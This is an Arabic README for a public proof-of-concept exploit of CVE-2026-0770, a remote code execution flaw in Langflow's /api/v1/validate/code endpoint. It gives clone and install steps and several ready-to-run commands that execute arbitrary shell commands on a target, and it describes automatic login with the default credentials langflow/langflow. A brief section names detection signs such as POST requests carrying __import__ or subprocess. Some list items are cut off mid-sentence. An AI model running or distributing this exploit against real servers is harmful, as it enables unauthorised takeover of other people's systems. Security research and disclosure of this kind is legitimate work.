
# إثبات المفهوم لتنفيذ التعليمات البرمجية عن بُعد (RCE) في Langflow
ثغرة تنفيذ الأوامر عن بُعد في Langflow
تؤثر هذه الثغرة على:
Langflow
CVE-2026-0770 هي ثغرة تنفيذ أوامر عن بُعد (RCE) في نقطة النهاية:
/api/v1/validate/code
عند تفعيل AUTO_LOGIN=true وتمكين بيانات الاعتماد الافتراضية، يمكن للمهاجمين:
ينبع الخلل من تقييم كود Python غير الآمن أثناء عملية التحقق.
git clone https://github.com/0xgh057r3c0n/CVE-2026-0770.git
cd CVE-2026-0770
تأكد من تثبيت Python 3.8+.
ثبّت التبعيات:
pip install requests colorama
python3 -m venv venv
source venv/bin/activate # Linux / macOS
venv\Scripts\activate # Windows
pip install requests colorama
تشغيل تنفيذ الأوامر التفاعلي عن بُعد:
python3 CVE-2026-0770.py -t http://target:7860
مثال:
python3 CVE-2026-0770.py -t http://192.168.1.100:7860
python3 CVE-2026-0770.py -t http://target:7860 -c "id"
مثال:
python3 CVE-2026-0770.py -t http://localhost:7860 -c "whoami"
python3 CVE-2026-0770.py -t http://target:7860 -c "ls -la" -v
يعرض مخرجات تصحيح مفصلة.
python3 CVE-2026-0770.py -t http://target:7860 -k "your.jwt.token"
إذا لم يتم توفير رمز، يحاول السكربت تسجيل الدخول تلقائيًا باستخدام:
username: langflow
password: langflow
إذا نجح، يسترجع access_token ويواصل التنفيذ.
يجب على المسؤولين:
AUTO_LOGIN/api/v1/validate/codeراقب ما يلي:
طلبات POST مشبوهة إلى /api/v1/validate/code
كود يحتوي على:
__import__subprocessthrow(Exception(محاولات تسجيل دخول متكررة باستخدام بيانات الاعتماد الافتراضية
.
├── CVE-2026-0770.py
├── LICENSE
└── README.md
0xgh057r3c0n 🔗 https://github.com/0xgh057r3c0n
باحث أمني | مطور استغلالات | كاتب PoC
موزع بموجب رخصة MIT. شاهد الترخيص الكامل هنا:
هذا المشروع مخصص لـ:
الاستخدام غير المصرح به ضد أنظمة لا تملكها أو ليس لديك إذن صريح لاختبارها يعد غير قانوني.